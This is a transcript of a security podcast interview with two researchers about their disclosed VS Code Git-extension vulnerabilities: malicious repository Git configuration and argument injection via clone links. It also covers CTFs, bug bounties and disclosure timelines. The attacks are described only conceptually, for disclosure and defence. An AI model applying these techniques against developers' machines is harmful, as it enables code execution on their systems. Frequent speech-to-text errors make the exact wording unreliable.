The Hacker Mind: Hacking Visual Studio Code Extensions
Rather than use backdoor exploits, attackers are stealing credentials going through the front door. How are they gaining credentials? Sometimes it’s from the tools we trust. Researchers Paul Geste and Thomas Chauchefoin discuss their DEF CON 31 presentation Visual Studio Code is why I have (Workspace) Trust issues as well as the larger question of how much we should trust tools that we depend on daily.
Vamosi: In the book I wrote with Kevin Mitnick, The Art of Invisibility, we went around and around about password managers. Kevin supported them because they allow for complexity. I do not support them because if an attacker went after that one password manager and was successful then potentially all your passwords would be exposed. Very early on in career at CNET I found a bug in Norton Security Suite. By typing three random characters I could pop open the Norton Password Manager and see all the passwords I’d stored in plaintext. So I haven’t been a fan of password managers since then.
What happens if you are a developer and you need access to a variety of systems. And your employer requires the use of a password manager? Well that could get interesting.
In December of 2022, and again in February of 2023, LastPass, a password manager, disclosed that it had been breached, and potentially passwords for thousands of systems were exposed. The details are interesting. In this case, LastPass said that one of its DevOps engineers had their personal home computer hacked and infected with a keylogger. In the December 2022 breach, LastPass revealed that the threat actor leveraged the stolen information. The second breach, disclosed in February 2023, revealed an attacker was able to leverage valid credentials stolen from a senior DevOps engineer.
This is a new normal. Rather than develop a chain of zero days, even known exploits to break into a system, why not just walk in the front door with some Senior Developer’s credentials. It’s much easier. And it’s less noisy. Of course the Senior Developer had access to the source code …
The point is we tend to rely on tools out of convenience. Rather than develop a password schema and maybe only write down the first part of each password (which is what I recommend), there are password managers. And rather than parsing code from source, there are code editors. In a moment I’ll introduce you to two researchers who presented at DEF CON 31 on how a code editor used by 80% of the developer community had a flaw -- now fixed. It’s a reminder that even the tools we use and rely upon, they can sometimes be faulty.
[music]
VAMOSI: Welcome to The Hacker Mind, an original podcast from the makers of Mayhem Security. It’s about challenging our expectations about the people who hack for a living. I’m Robert Vamosi and in this episode I’m discussing how there’s no standard threat model for code editors today and how, even the tools we use daily, sometimes without thinking, also need to be checked for vulnerabilities.
[music]
VAMOSI: One of the more interesting talks at DEF CON 31 this year was entitled Visual Studio Code is why I have (Workspace) Trust issues. From their abstract they state that modern development tools offer increasingly advanced features and deep integration with ecosystems, sometimes at the cost of basic security measures. Code editors have tried to counterbalance it by introducing new lines of defense (e.g., "Workspace Trust"), leading to a cat-and-mouse game to restrict access while keeping most features available by default. I think you can see where there might be a problem. So I wanted to talk to the presenters to learn more about this trust issue.
GERSTE: Hi, I'm Paul Gaster. I'm a vulnerability researcher in sonars research and development team. And yeah, I love to break web things, especially in the JavaScript world. I used to be a developer but then I got hooked on CTF competitions. And now I'm a researcher in the r&d team, and instead of solving challenges and writing write ups, I audit open source projects and read blog posts about it.
CHAUCHEFOIN: And my name is Tomas Chauchefoin. I'm French, as you may guess, from the south of France, but every day is sunny. I've been in this security industry for six years now. And I've been looking to research sonar for two years and actually like join the same day as Paul and we share the same passions and roughly the same work so
VAMOSI: Sonar is a company that looks for Security Vulnerabilities and Hotspots in code review with Static Application Security Testing (SAST).
CHAUCHEFOIN: Sonar helps developers to write clean code. And under clean code, that means that it's code that's of quality, so you have less functional bugs, and also that safe so you have less security bugs and abilities. And we're trusted by more than 7 million developers and we're pretty proud of what we're doing.
VAMOSI: So, before we get started, I wanted to establish that before both of these men became professional security researchers they started with Capture the Flag competitions. In early episodes of The Hacker Mind I talked with members of the Plaid Parliament of Pwning, the team that has won the most DEF CON CTFs, and some of those members are today working for NSA and Google. So I asked Paul and Thomas about the CTF scene in Europe and how it might be a difference experience. Or not.
GERSTE: Yes, so I'm from Germany. And in Germany, we actually have to have quite a good and strong CTF scene I would say. So I got into it just by starting my studies on IT security. Here in Bonn, Germany. And here we have a student team. It's called Flux fingers. And we basically do a thing called Flux rookies where we introduce new people to the CTF scene because it can be quite hard, the top players that are experienced they want hard challenges. And if you start out, you will probably run against the wall and it won't be fun. So we try to have beginner friendly challenges and we help people out. So that's how I got started. And I think a lot of the teams in Germany and throughout Europe are based on student teams, university teams, because there you have the local thing where you can join together meet up play together there, which is always more fun than over discord or online.
VAMOSI: So Paul’s from Germany. Thomas is from France.
CHAUCHEFOIN: I think it's roughly the same thing in France, right? It's mostly we all start as students and we don't know it's professional yet. So we just have fun we play we discover new stuff. I think we build knowledge with CTFs all the time. In my case, my only exposure to security before working in this industry was full CTFs. So everything I knew at the time was thanks to CTFs I think it's we perform.
VAMOSI: Are there any major CTF competitions in Europe that I might not have heard of?
GERSTE: So there's this website called CTF time, where there's a list of all the big CTFs that you have, you can rate them and they have a rating then score where you can see which ones are rated higher and which ones are very rated probably lower. So you can go on there to see for example the CTF That's me and my team are hosting the hot glue. CTF is pretty old. We do it since 2011. And it's also one of the highest rated ones. But then of course in other regions of the world, for example DEFCON CTF, there you have the very prestigious names and also recent additions from the Asian room. Real world CTF is also a pretty cool one that happens every year. That's based on the name is very close to the real world. They have one day challenges or sometimes even zero day challenges where they just give you a piece of software and the latest version and in a maybe slightly weird configuration. But then they say, let's go. You need to find a way to get remote code execution. So it's becoming very close to the real world.
VAMOSI: So how does one take experience with CTFs and turn it into a career?
GERSTE: Yeah, I guess as Thomas already said, you start out just to have fun just to play just to see what is the thing what's going on and then you learn a lot of your practical skills for me. I was playing it while studying. So in university I got the lectures and the formal education and everything in theory, and then I could use some of that in practice and learn even more practical skills with CTFs. I think there's a big difference between hearing about something in a lecture or doing a small exercise for it and actually going through the full path of finding vulnerability exploiting it, and maybe reporting it or making a write up about it. So yeah, you'll learn a lot there. And then at some point, the world becomes the challenge, if you want to say so, where you can just take any, let's say open source project and start auditing. But of course, in the CTF, you know, there is something and in the real world, you don't know it. There probably is always something so you all probably know. But yeah, you don't really no it's so during the my CTF career if you want to call it a carrier. I also build up a high frustration tolerance, where if you play for yet our CTF, of course with sleeping breaks, but if you don't find anything playing one challenge for two days straight, it can be pretty frustrating. But still you learn a lot along the way of new technologies or of things that don't work and the next time you know that they don't work. And in the end, you can read somebody else's write up and then you will learn what the vulnerability was and how to exploit it.
VAMOSI: In episode 09 of The Hacker Mind I talked with someone who traveled the world with HackerOne, getting paid to find bugs in various code bases. So Have either of you done bug bounties?
CHAUCHEFOIN: Oh, yeah, I did some bug bounty in the past and I don't do it anymore. You know, like different kinds of bug bounties practice Yeah. So famous one factor one's big crowds platforms. Kind of web bug bounties out also some was a way to sell bugs in the way that would be disclosed with like competitions like one two on so I stopped doing this web bug bounties because most of the time only blackbox. Auditing you. They give you websites you have to break into it. But don't you don't get access to source code or anything. And it's I find it much less fun. I really love to have code and just dig into it. Try things and just like it I find it more creative and less obvious the same thing. But we took laid punting on together which is now I r&d team. It was pretty cool. Different kind of targets and one we get used to. So we can call it bug bounty.
GERSTE: Speaking of bug bounty, sometimes we also do get duck bounties for the things we report from our sonar work stuff. So every time we find something we report it and some of the projects do have a bug bounty, I think one cool one was that the bug bounty that we got from Microsoft, for one of our things we found in Visual Studio code. It was $30,000 back bounty, which we give to charity. And yeah, it's also quite a fun story because one year after we found something with the same impact, and they said oh wait a minute, last time we basically awarded this by error. So sorry, you're not getting it this time. But yeah, sometimes we even get tacked on like this. And I also have to say I prefer the way we do it right now. We get paid to just do the research. And we don't have to. Basically we're not dependent on the bug bounties like you would be if you're a full time bug bounty hunter. So this allows you to go much more into depth into certain topics and not just to hunt all the low hanging fruits to get something.
CHAUCHEFOIN: you're also not being driven by the same incentives right. You're not looking for money, you're looking for bugs, you're looking to improve the security of these products and projects. You're not just trying to make money. So it's also less frustrating when things go wrong, which is larger, but you're not getting paid for anything. So this is the best way to do big bounty in a way not getting the money.
[MUSIC]
VAMOSI: The presentation that Paul and Thomas gave at DEF CON was about two vulnerabilities in Visual Studio Code. These are CVE-2021-43891 and CVE-2022-30129. This was a case where they found and reported one vulnerability, and then a year later found another vulnerability similar to the first.
GERSTE: it's called an extension with practice. It's a built-in module that you can disable. So it's called extension by Microsoft, but in practice, it's just a feature of the code editor.
VAMOSI: So why were you looking at this? What led you to start investigating this?
CHAUCHEFOIN: I would say it's the most popular IDE right now. At least in certain, let's say language communities. A lot. A lot. A lot of people are using it. So it's a big impact if you find something in there, right? Because you directly affect almost 80% of all developers essentially. So it's a pretty interesting target. Yeah, just because of that, and then it's also a big codebase I think 800,000 lines of code. There's a lot of opportunity for stuff to go wrong. So that's why we wanted to look into it. And we also Yeah, we're seeing other people, other researchers find bugs in there. And some of them looked interesting, because there's a lot of different attack surfaces. And in general, this is a tool for developers. So it's not like a server that's running somewhere that you can directly attack over the internet. It's something people run on their own. And so it's also an interesting context. It's interesting. threat model. Let's say it because for a lot of different developer tools, it's not very clear. What's the responsibility of the tool, and what's the responsibility of the developer. Should I open this unknown file with my IDE? Can something go wrong? Is it my responsibility to not do it and to vet the file first, or is my IDE safe enough to block anything malicious? So it was also interesting to us.
VAMOSI: This brings up a good point. If you want to attack a vendor, you might want to go through the developers writing code for that vendor’s product.
GERSTE: and we've seen a lot of like into wild campaigns against developers, I think is the most recent example and maybe the most use was one was on LastPass versus one day vulnerability, exploited identity. We don't have all the details. So when they don't need to exploit it against a DevOps engineer, was working for them and they kind of broke into, say a home network from the outside was routine. And they got access, I think through some keylogging to the work laptop, and then they got access to LastPass production servers from the success. So in the end, if you compromised developers, you will likely get access to production systems, you will likely get access to source code, which is a big asset for companies these days, you will maybe get access to secrets and you know, API keys, everything. It's very impactful in to get to targeted numbers.
VAMOSI: By now we should all know about Zero Days, but Paul mentioned One Day and so I want to get his definition of that.
GERSTE: So I think in general, we call a zero day. Everything's that's not known outside of like a small private circle. I think the name comes from this notion that if it's a zero day you add zero day to protect yourself against the viability. So it's just came out publicly, there is no available workaround patch. And in general, we also use this terminology to say like a zero day is something that, you know, maybe your friends now, your colleagues know that the public is not aware of the absence of ability, so nobody can protect themselves against it. And one day is also we can call it N day to say it was one day, two days, three days, any number of days you won't. And it's so weird to say that it's it's something that's known that kind of track it's likely got to see ID before, maybe some patches available, maybe workarounds. But maybe in this case, the patch was not deployed, it wasn't applied on a given system. So you can still break into the system with a one day so we've known
VAMOSI: So you've targeted this system, which is used by 80% of the developers. I imagine, given that it's used by so many people, that it's fairly hardened. But you must find some areas that are less locked down and then you just pursue that until you find some bugs that are interesting. You must go through a lot of bugs that aren't interesting.
CHAUCHEFOIN: Yeah, and like Paul said, It's 800,000 lines of code. It's huge. It's like you could build small operating systems with much less line of code. It's a huge project. So there will be bugs and like you say, there will be useless boxing to get. But for us, what was interesting is that for search tools, you want to get deep integration with CI consistent with every language and VS code spot, many, many languages. I think it's one of the reference code editors for JavaScript, TypeScript. I know a lot of people do PHP in it. And you need to integrate with all this ecosystem to offer features to help you download all dependencies as Canada code and help you to develop faster and better. So because of this deep integration, it's also easier, maybe for attackers to find security flaws, because you will be calling a lot of external binaries. You will be trained to do your best to have a lot of information to the user. But maybe to collect information you need to run code from the user that comes from a local project, you may need to call remote servers and exchange information with them. A lot of things will be happening. And a lot of these things aren't really at the control of the fees and will still code developers they like if you in our case, we found the ability to get extension. And what's critical is that if you could develop this code, your VS code developer, you write the code extension you will called Git and Git will do all that stuff late to get for you. You don't need to re implement kids in your in VS code. But it also means that every single community that affects kids will affect its code. And you cannot do anything as a developer to prevent this from happening. Except not calling it anymore, but you needed to facilitate integration with projects and the usual developer workflows. So it's a weird trade off if I need to do complex and maybe security sensitive things to be nice for the user. And I have no control on all these binaries. And all these other components are working internally. So it's really hard to remember to make everything safe to know what to look at.
{Music}
VAMOSI: So,we’ve talked about Microsoft, but remember this also a GIT problem as well. I asked Thomas and Paul to explain this. Was this an integration flaw with GIT or was this is an actual code flaw..
CHAUCHEFOIN: So we found two bugs in the kit extension. The first one was directly related to get so when you develop with kits, you can configure the tool. You can have a system wide configuration for all your system, all your users. You can have user specific configuration in your own folder to I don't know whether to set your own name when you commit, secure email address or just a general feature that gets added to get the project server configuration, that dot Git folder that comes with your project. And that could be Anzahl sensitive options that you can set in these configuration files. For instance, in our case, we've demonstrated that if you ship and if you send somebody a good project with some additional configuration that executes good, execute malicious commands. Once they will open it in VS code VS code directly run git and say oh, can you please look into this folder? And try to run some actions like give me a status update of all files that were modified since the last time. I've looked at these kind of integrations. And because it uses this malicious configuration, we would be able to force the user to execute arbitrary commands on the system, which is never something that you want, and they fixed it by first asking you if you trust a folder or not, so they could trust your workplace. If you don't trust the folder, this extension won't run anymore, so it's kind of safe. But if you click a trust, this empty is still present. So I was to use this new trust based system to kind of try to let you evaluate the situation. Do I know what it's coming from? Or is it just a random zip file coming from the internet? And depending on this choice, several take riskier or less risky actions. Should I look for a through z or the buck? Yes, please. And so as he also one was related to protocol endless, so you know, when you go on your web browser, you type https colon slash slash, it's an HTTPS link. The browser knows that it's gonna have to connect to the internet and do a DNS query. At the HP query of SSL and display you see results. But if you type something like a file, a slash, so the browser will say okay, so the user wants to access a file on my system. So I will display this files. And every, every app on the desktop can reduce to this protocol endless. So in the case of VS code, say Register VS code, colon slash slash, and it's really practical. It's really useful for developers, like if you've got to get an instance, you get this cloning my ID button, two tickets. The system also is vs. code link. It will not affect the US Code and Okay, somebody's trying to clone a git repository with VS code, so VS code will chop and say do you want to clone this folder? Yes. Now, why do you want to clean it? Put it on my desktop, for instance. And then it pulls Git to clone this repository. And we found that in the way this operation was done, it needs the address of the person to reach Claude. It needs it needs to give it to get but the way it's done, we could inject additional arguments to the beautification. And we could first get our trick get into executing arbitrary commands instead of Cloninger with history. So basically, you would go online at GitLab GitHub, you would see this clone with my IDE buttons, and you would click it if you accept cloning this with history, an arbitrary command will be executed instead. And it would be a trusted adviser, I guess, obviously. So it requires interaction, but it's something that's part of everybody's workflows. I use it personally. Or maybe you use it a bit less now. But it's something that's made to be useful. It's made to be part of your workflow. It's made to make your life easier. So everybody's using this kind of feature. And it's really hard to defend against it, except if you start removing every single link on which you are clicking, which is not easy.
VAMOSI: I also wanted to know what sort of tools would you use to discover this vulnerability, in other words, are you parsing the 1000? Lines? Statically? Are you looking at Dynamic tools like fuzzing or other things?
CHAUCHEFOIN: So first of all, the first thing we do in every audit is we use our own product, which is a static analysis tool to check the code for us. And if it finds something, then we can just use it, verify it and directly report it. And yeah, if it doesn't find anything, which I think never happens, it always finds at least something vague, that we can then look more into. Yeah, then we have to do it manually. And then yeah, we also use code editors, or code viewers. For us. We don't edit it. But yeah, we just read a lot of code. And then of course, we also set up the application to have a debugging setup to poke at it. A little bit dynamically. But yeah, regarding tools is allowance taking static analysis engine and code editors
GERSTE: Good Delphi is I guess, and what's cool with VS code is that you can so basically we've been looking at the code of VS code in VS code. And we can also debug vs. code with vs. Code debugging features. So you it's why it's so practical, and everybody loves it, right? It's really well integrated. And even for us when you do security research in general on such things, getting the right debugging setup and even being able to build projects could take some time, it'd be a tedious task. And the case of VS code was really, really useful and easy.
VAMOSI: So you get these bugs, you're going through them and you find one that's interesting, and walk me through the timeline of when you realize that this was the real thing. And and how short of time was it before you contacted Microsoft with a proof of concept?
CHAUCHEFOIN: So we've been reporting so many communities in the past few years, we've been in the research and development team, we like it really well, like the established disclosure process. So once we have to talk, we think that maybe something we consume it so we try to get let's say with the nice it's in practice, we're not making it like just distributed malware or anything. We're just making a calculator, which shows that we could force the user to execute a simple calculator, which is nothing crazy, but it's a visual and you see and you know, that the command was correctly executed. So once it's confirmed, we went through the MSRC platform. So it's like a bug bounty platform, but it's specific to Microsoft, you will register, you create a new submission, and you put all the details. So we have a small advisory or observations, what's the impact of the community or can you exploit it? And are we think it should be rejected? So we sell all this information for two bucks. So let's say between the discovery of a bug and at the time we create a new submission on this platform, it's slightly, two or three days. It's easy for us to create, set, and enter. And then I think Microsoft tries to do this 120 day kind of disclosure policy, but I don't think they applied for every single bag, but basically, they promise they will get back to you in a short amount of time. And you know, in our case, everything was fixed within, I would say two months, which is I think, quite efficient because I think it internally needs to get dispatched from the security team to the developers and then the developers need to think okay, my next sprint, I'm gonna fix it and then they need to fix it. It has to go for reviews. And when you fix a security bug, you don't want to leave the patch out in the open for everyone to see. You want to directly release a new version that everybody can install an update to, to benefit from scratch. So I've also things I need to kind of align with release dates and everything. So I think two months. So delay is crazy for a company like Microsoft. And for us, it's perfect because we use this 90 Day disclosure policy. Delay. I think it's pretty standard in the industry. Google Project Zero has been using it for a long time now. And basically we say okay, we will close everything and set up for the day. We give you 90 days to fix it. And if you patch everything before it's all good, everybody's happy. And all the 90 day we will come back to you and say okay, maybe like did you start working on it? Can we help, can we maybe give you a patch, can we make some faster and if after this 90 days, nothing was fixed. We may read these bigger theories for people to be able to defend against bugs. Because if they either explode into the wild or if they are already known by other people in the space, they may get flooded. And we want to give ways to vehicle users to protect themselves. But in the end, Microsoft was always on time and they always fixed everything. Particularly
VAMOSI: I asked Paul what the process of reporting it Microsoft was and the feedback?
GERSTE: Oh, I would say that's that's pretty much it. I mean, this was specific to Microsoft, but it's pretty similar with all the other vendors. Some of them are really responsive. And I think the record was that things were fixed and deployed. Hours after all reports, which is very cool to see. Sometimes, they do take more time. Sometimes we have to annoy them a little bit more via email to Hey, do you have any patches, please fix this. But in the end, almost every vendor fixes the vulnerabilities we report. So it's a nice impact to see that the whole ecosystem is getting more secure by this.
VAMOSI: So did you get one or two CVS out of this?
CHAUCHEFOIN: So we got two CVEs. So we're like, really like a book class. Like the reason why this book exists is different for the two cases. So even use our kind of clothes into code and kind of same confidence. They got two distinct CVEs.
CHAUCHEFOIN: So it was the first bug that was using a good local, local first bag that was the first bag that was using the get local configuration got to CBSs or seven or eight. And the second one based on protocol endless got CBSs of 8.8. And I think that we still need to mention these cases. Dispatch requires interaction from the user, you need to clone or to import some issues if added Somebody just sent you posted somewhere. In the case of a link, you need to click a link and do a few actions. So it requires interaction. It's not like you know, zero click ASCII something. But I think in the context of a code editor, it's fine. It's it's action you're going to do in your day to day workflow anyway. So we can say it's still a risk, and also the attack vector or even the CVSS. You can be local, you can be remote, you can be network, and it's called remote code execution. But I think a proper term for it would be arbitrary code execution. It's remote, but because the attacker is remote, not because from the remote position, they can directly attack you, right? Because of interaction requirements. So CVSS for certain pieces would be tricky to get right. I think it's one of the pitfalls of the CVSS system. Still, yeah, tells you, you may want to take up a squat instance.
VAMOSI: So it's going to show up high on any sort of reporting system as one that you should pay attention to.
CHAUCHEFOIN: Yeah, right. And you should take care of it and update everything.
[Music}
VAMOSI: So you’re a security researcher and you found two vulnerabilities in Visual Studio Code which is used by roughly 80% of the developer market. So that would be the dangerous scenario for anyone not patching this , how would they be vulnerable to having remote code executed?.
CHAUCHEFOIN: Yeah, absolutely. Yeah, it's and once again, it's because of actions that would be better for your workflow. It's, I would maybe clone some dependency to reduce the dependency in my code editor because I mean, all developers are using colleges. We are security researchers. We are also using code editors to read code because it's a four. So every time you want to read code, and you don't trust it, it's it's tricky, right? Because you're opening unsafe code and if you trust the folder a bit too much, and like when there's no tails, you do this folder if you say yes, you're gonna get compromised. So that's why when you get tricky
GERSTE: and it's not only IDEs, right? Thomas and I also found a similar vulnerability in command line, shells and shell integrations, where if you have your command line prompt to basically show you the current branch or if files have been modified or not, this will run the same git commands under the hood. So instead of opening a potentially malicious folder with your IDE, while you might think, okay, maybe my IDE does something not so good here. You might want to only go into the folder in your command line, and even that could get you compromised. Whereas I think most people would think oh, I only enter the directory with my shell and maybe use the cat command line utility to look at the contents of a file. Nothing can go wrong, but even there, something could bite you.
CHAUCHEFOIN: I would say yeah, it showed us again that in the world of developer tools, there is no clear boundary of responsibility between the user and the tools. And for every tool, it's kind of different. So as a developer or anybody who uses Developer Tools, you really have to be careful if you use third party projects to files or code.
VAMOSI: Yeah, it's the classic trade off between convenience and security.
CHAUCHEFOIN: So we also reported this kind of behavior to the git maintainer. We said oh, yeah, at no point. At no point should I execute things on my behalf. Just because I got to know history from the internet. And I got into the wrong folder with my tools. Maybe it should be disabled by default, maybe we should only pass the system wide configuration and the user wide configuration. And by default, never run or never take anything from the local configuration, unless I explicitly trust it. Kind of VS code whitespace trust fixture before get directly but they say no if you if you trust somebody or something enough to get the code from a remote location, we believe that it's on you. You have to be aware of this pitfall. And it's where we kind of disagree because every time we present this weird behavior to people, to developers to security experts, we all get surprised everybody gets surprised at this behavior. You never expect that by default some tool would maybe help somebody to compromise your system. For the developers of Git say no, it's part of the threat model. But it's not part of the expected threat model that everybody has in mind when to use Git. And that's why this slight distinction is really important for security. If nobody is aligned on what should be safe and what should not be safe. Everybody will get surprises and it's not the kind of surprises I want to get.
VAMOSI: So what’s the general takeaway from this?
CHAUCHEFOIN: And I think a good takeaway of this research is that basically, if you don't trust a git repository, you should not use Git. It's and Git is everywhere. It's in your cottage. Or it's in your shell prompt in every single developer tool. And the thing is, it's currently unsafe to use a Git with histories that you don't trust. So it's something to be aware of. And while this code shows us these prompts before running the get action to task you have to trust a folder or not. For many of the tools it is not the case they don't have the same trust based system. So just run commands directly. Like Paul was saying in this shell prompt. That means if I have a fancy terminal, as a developer, I like to have fancy stuff and even a security researcher. I like to finish stuff on my laptop. I just get into the wrong folder that I got from GitHub or anywhere. I get compromised. It shouldn't be that easy. And I think This is where we have this weird trade off between. I want deep integration with everything. But I want to be safe. It's kind of exclusive. You cannot get the best of both worlds. You need to remove some fancy features of your favorite tools if you want to be safe. And if you know that everything else because you already in comes from your colleague and you trust them, you trust everybody. You get maybe nicer tools and visualizations, but it's really hard to depend on for security. Yeah, and for me, I would like to see this trust based system, but you have to use it right? And I think in general, editors, publishing this tool set to kind of embed this trust page based features to tell you if you click yes, it's on you and you will get compromised. Because I still think that when you get this kind of screen, you will likely want to say yes, because it's weird screen is bugging you, and you don't want to take the time to read everything. And you just want to say yes, and I did it and I have done it all the time. And now I stopped because I know it's really unsafe to do it. Now. And I think, in general, everybody should not be upfront about this stuff. Say if you click yes, something bad will happen. And it's on you.
Add Mayhem to Your DevSecOps for Free.
Get a full-featured 30 day free trial.